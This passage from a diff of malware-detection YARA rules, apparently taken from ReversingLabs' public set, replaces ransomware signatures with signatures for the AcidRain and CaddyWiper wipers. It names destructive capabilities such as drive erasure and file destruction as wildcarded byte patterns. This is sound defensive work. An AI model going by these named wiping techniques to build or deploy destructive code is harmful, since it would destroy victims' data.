?? ?? ?? 01 D0 66 C7 00 ?? ?? - 8B 45 ?? 83 E8 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 + $corrupt_physical_drive = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F + 11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? + BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ?? + 50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? + 75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ?? + ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ?? + ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ?? + ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? + 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90 + 8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70 + ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ?? + ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70 + ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89 + 4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85 + DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ?? + FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E + 5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ?? + 5F 5E 5B 8B E5 5D C2 } condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and ($corrupt_physical_drive) } -rule REVERSINGLABS_Win32_Ransomware_Good : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Trojan_Acidrain : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Good ransomware." + description = "Yara rule that detects AcidRain trojan." author = "ReversingLabs" - id = "e0f97200-7fe9-5811-b6cd-708ecc3a2fbc" - date = "2020-07-15" - modified = "2020-07-15" + id = "802c7eb7-d407-5b07-a6b4-4648d3ad80e9" + date = "2024-05-10" + modified = "2024-05-10" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Good.yara#L1-L82" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6737853a77a6008f9fd2141bb6b13d595f1cb7e832be944596f709e1fcdf8003" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Linux.Trojan.AcidRain.yara#L1-L67" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5b47a0de8bda09d217f8a148e561f3da7ce4945f011f4a9b5dbbca88157d3080" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Good" + tc_detection_type = "Trojan" + tc_detection_name = "AcidRain" tc_detection_factor = 5 importance = 25 strings: - $find_files = { - FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D - 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E - 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 - C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8B 3D ?? ?? ?? - ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? - ?? ?? ?? ?? FF D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8B D8 83 FB ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 5F 5E 5B 8B E5 5D C3 + $destroy_files_using_ioctls = { + 55 89 E5 57 BF ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 7C 24 ?? 8B 45 ?? 89 04 24 E8 + ?? ?? ?? ?? 85 C0 89 C3 78 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D + C3 8D 45 ?? BE ?? ?? ?? ?? 89 44 24 ?? 89 74 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 4D ?? + 8B 55 ?? C7 45 ?? ?? ?? ?? ?? 85 C9 89 55 ?? 74 ?? 8D 75 ?? 8D B6 ?? ?? ?? ?? 8D BF + ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? + ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 01 D0 39 45 + ?? 89 45 ?? 77 ?? 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? C7 45 + ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 75 ?? EB ?? 31 C9 89 4C 24 ?? 8B 45 ?? 89 + 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 7C 24 ?? 89 1C 24 89 44 24 ?? E8 + ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 76 ?? B8 ?? ?? ?? ?? 89 74 24 + ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C + 24 E8 ?? ?? ?? ?? 80 7D ?? ?? 75 ?? A1 ?? ?? ?? ?? 89 7D ?? 89 45 ?? 8B 45 ?? 89 45 + ?? 8D 45 ?? 89 44 24 ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? + 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? 31 FF 89 1C + 24 E8 ?? ?? ?? ?? 31 C0 89 44 24 ?? 89 7C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 75 ?? C7 + 45 ?? ?? ?? ?? ?? 85 F6 74 ?? 8D 75 ?? 8D 76 ?? B9 ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 + ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 89 1C 24 + E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 } - $remote_connection = { - 55 8B EC 53 8B 5D ?? 57 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 0F 8B - C1 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4F ?? 83 C4 ?? 8B C1 83 E8 ?? 74 ?? 83 - E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? - ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? 83 F8 ?? 77 ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 83 7F ?? ?? 75 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF - 77 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 FF 77 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 45 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 5E FF 77 ?? 53 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5B - 5D C3 + $destroy_files_using_overwrite = { + 55 89 E5 83 EC ?? 89 5D ?? 8B 5D ?? 8D 45 ?? 89 75 ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 5D ?? 8B 75 + ?? 8B 7D ?? 89 EC 5D C3 } - $encrypt_files = { - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B C8 8B F2 83 C4 ?? 2B CE 8D 71 ?? - 66 90 0F B7 0A 8D 52 ?? 66 89 4C 32 ?? 66 85 C9 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 8B 35 ?? ?? ?? ?? 47 89 7D ?? E9 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 - 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? - 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 - FF D6 8B 3D ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? - 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 53 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 - 5D C3 + $redundant_reboot_attempts = { + C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 8D 76 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 + 24 E8 ?? ?? ?? ?? 31 D2 83 C4 ?? 89 D0 59 5B 5E 5F 5D 8D 61 ?? C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($remote_connection) + uint32(0)==0x464C457F and ($destroy_files_using_ioctls) and ($destroy_files_using_overwrite) and ($redundant_reboot_attempts) } -rule REVERSINGLABS_Win32_Ransomware_Meow : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Meow ransomware." + description = "Yara rule that detects CaddyWiper trojan." author = "ReversingLabs" - id = "7cebb04d-1cda-5ad1-b412-8b38df7b2550" - date = "2022-10-24" - modified = "2022-10-24" + id = "ad437f29-4ad8-5a88-a0b6-03de55e7375f" + date = "2022-03-15" + modified = "2022-03-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Meow.yara#L1-L84" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b00753d2b150a815279297ddf40d70051d25de1c32bb90f5b706ea7fd36bb871" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.CaddyWiper.yara#L1-L95" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "178ff4171c09866f6b303bdff234beff1116d268995ee4dc236332e472d645b1" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Meow" + tc_detection_type = "Trojan" + tc_detection_name = "CaddyWiper" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files_p1 = { - 72 ?? 8D 45 ?? BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 68 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 33 F6 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B4 B5 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C - ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 5F 5E 33 C0 5B 8B E5 5D C3 CC 55 8B EC 83 EC - ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? - ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? - ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? - ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? - 75 + $destroy_if_not_controller = { + 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 39 ?? 75 ?? EB ?? 8D 55 ?? 52 FF 55 ?? + C6 45 ?? 43 C6 45 ?? 3A C6 45 ?? 5C C6 45 ?? 55 C6 45 ?? 73 C6 45 ?? 65 C6 45 ?? 72 + C6 45 ?? 73 C6 45 ?? 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? + C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D + ?? ?? 73 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 04 ?? 88 45 ?? EB ?? E8 ?? + ?? ?? ?? 8B E5 5D C3 } - $encrypt_files_p2 = { - 8B 45 ?? 40 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 25 ?? ?? - ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 74 ?? 8B 4D ?? 8D 46 ?? 03 CF 0F AF C8 89 4D ?? 8B - 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 75 ?? B9 ?? ?? ?? ?? 90 8B 45 ?? 99 - F7 F9 8B 45 ?? 85 D2 74 ?? 48 EB ?? 40 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 - C8 ?? 83 C0 ?? 74 ?? EB ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 74 ?? 8B 45 ?? 8D - 4E ?? 83 C0 ?? 99 F7 F9 B9 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 75 ?? 8B 45 - ?? 99 F7 7D ?? 8B 45 ?? 85 D2 74 ?? 40 EB ?? 48 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 - ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 FF - D0 C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 45 ?? 99 F7 F9 8B 45 ?? 85 D2 74 ?? 83 C0 - ?? 03 C3 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 0F 85 + $erase_drive_data = { + C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D ?? 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 45 ?? 83 + 7D ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 55 ?? 8B 45 ?? 50 FF 55 ?? 8A 4D ?? 88 4D ?? 8A + 55 ?? 80 EA ?? 88 55 ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 8B E5 5D C3 } - $drop_ransom_note = { - 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 - FF 74 ?? 8B CF E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 6A - ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D0 6A ?? - 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A - ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 8B F0 BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 35 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF D0 B9 ?? ?? ?? ?? 8D BD ?? - ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? 50 66 A5 A4 E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD B8 ?? - ?? ?? ?? 5F 5B 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + $erase_drives_recursively_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF C6 85 ?? ?? ?? ?? 2A C6 85 + ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 5C C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8B 4D + ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? + ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 + C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 64 + C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 73 + C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6C + C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 41 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6B + C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 72 + C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 + C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 33 + C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 32 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 2E + C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C + C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 00 + C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 } - $find_files = { - 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF - B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 - 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 - ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 - C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? - ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 + $erase_drives_recursively_2_p1 = { + 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? + ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E1 ?? 0F 84 ?? ?? ?? ?? 0F BE 95 ?? + ?? ?? ?? 83 FA ?? 75 ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 0F BE 8D ?? ?? ?? ?? 83 F9 + ?? 75 ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 75 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? + 74 ?? E9 ?? ?? ?? ?? 8D 